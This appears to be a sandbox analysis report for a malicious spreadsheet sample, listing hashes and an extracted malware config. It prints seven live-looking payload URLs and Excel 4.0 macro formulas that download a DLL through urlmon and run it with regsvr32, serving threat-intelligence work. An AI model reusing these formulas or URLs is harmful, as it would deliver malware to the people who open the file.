General
-
Target
513265eb448294de2fc52171831f57a336368898a8996b37f6354e89b1534b50
-
Size
18KB
-
MD5
01880d7aac5e22b2200ea126382c4ff4
-
SHA1
da21ec3d8a02bb9cdd3dbca5827180bcfc4b2380
-
SHA256
513265eb448294de2fc52171831f57a336368898a8996b37f6354e89b1534b50
-
SHA512
791137f7abd40de6243d7490c67994268d44a64195c42ac8c1cb2dec2a9af660f8c2612b68f2a2ee3dcdaf1a2a205b4299d2592117165c3045c401e8bf79c316
-
SSDEEP
384:2ChjSwgb13+QpzlIGIKeVBZqt7cTLqpD7Z5qRgpIMqIztDUOa:2CVPg5Tpz2G/ecmCpDSOpIMDte
Malware Config
Extracted
https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/
http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/
http://www.cafe-kwebbel.nl/layouts/3Wkev/
http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/
http://borbajardinagem.com.br/erros/vlB3f6XpsZG/
http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/
http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Signatures
Files
-
513265eb448294de2fc52171831f57a336368898a8996b37f6354e89b1534b50